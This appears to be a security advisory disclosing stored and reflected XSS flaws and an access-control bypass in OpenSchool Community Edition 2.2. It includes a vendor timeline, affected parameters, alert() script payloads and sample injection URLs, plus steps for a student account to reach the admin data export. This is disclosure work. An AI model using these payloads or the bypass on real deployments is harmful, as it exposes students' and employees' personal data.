# Exploit Title: OpenSchool Community Edition (version 2.2) Multiple Vulnerabilities
# Date: 25 January 2015
# Exploit Author: Mahendra
# Vendor Homepage: www.open-school.org
# Software Link: http://sourceforge.net/projects/fiyo-cms/
# Full version demo: http://www.tryopenschool.com
# Version: 2.2
# Tested : Kali Linux 1.0.9a-amd64
# CVE(s): CVE-2014-9126, 2014-9127
*Advisory Timeline*
13 November 2014: Vulnerabilities reported to vendor
14 November 2014: Vendor responded and details provided
14 November 2014: Vendor acknowledged the vulnerabilities
17 November 2014: Vendor fixed the vulnerabilities, except for XSS in CSRF tokens.
25 January 2015: Advisory released
----------------------------------------------------
Stored XSS - 2014-9126
----------------------------------------------------
*Proof of Concept (PoC)*
? Affected page: /index.php?r=students/studentDocument/create
Affected parameter: StudentDocument[title][]
Step to reproduce:
1. Login as admin and select one of the students profile.
2. In the profile page, select Documents and upload a new document.
3. Name the document file as <script>alert(1)</script>
4. The file will be saved and when the page is refreshed, the malicious javascript will be executed.
? Affected page: /index.php?r=students/studentCategory/ajax_create
Affected parameter: StudentCategories%5Bname%5D
Step to reproduce:
1. Login as admin > go to Students > Manage Student Categories > Create New Category
2. Insert the malicious javascript <script>alert(1)</script> into the category name.
3. Saved the category and observed the malicious script is executed.
? Affected page: index.php?r=students/studentPreviousDatas/create&id=1
Affected parameters:
o StudentPreviousDatas%5Bcourse%5D
o StudentPreviousDatas%5Binstitution%5D
o StudentPreviousDatas%5Btotal_mark%5D
o StudentPreviousDatas%5Byear%5D
----------------------------------------------------
Reflected XSS - 2014-9126
----------------------------------------------------
? Affected parameters: YII_CSRF_TOKEN cookie in the HTTP Header
Step to reproduce: added the malicious javascript </script><script>alert(1)</script> in the YII_CSRF_TOKEN cookie header.
http://192.168.248.129/osv2.2-CE/index.php?r=students/studentCategory&6b76b'-"</script><script>alert(1)</script>-'a29af=1
http://192.168.248.129/osv2.2-CE/index.php?r=site/emanage&ename=&employeenumber=ccd51<script>alert(1)<%2fscript>d5927&Employees%5Bemployee_department_id%5D=&widget=&val=
http://192.168.248.129/osv2.2-CE/index.php?r=site/emanage&ename=daa4c<script>alert(1)<%2fscript>97ab5&employeenumber=&Employees%5Bemployee_department_id%5D=&widget=&val=
---------------------------------------------------------------------------------------------
Access control bypass from student portal to access administration interface - CVE-2014-9127
---------------------------------------------------------------------------------------------
The application only allows the admin user to export students and employee database which contain personal information such as address and email address.
Any students that have access to student portal can bypass the access control by directly visiting the export link.
This functionality was not available in community edition and was tested on the demo version provided by Open-School team.
Proof of concept:
1. Login to student portal as students
2. Go to http://tryopenschool.com/index.php?r=export
3. Observe the export function is now accessible to students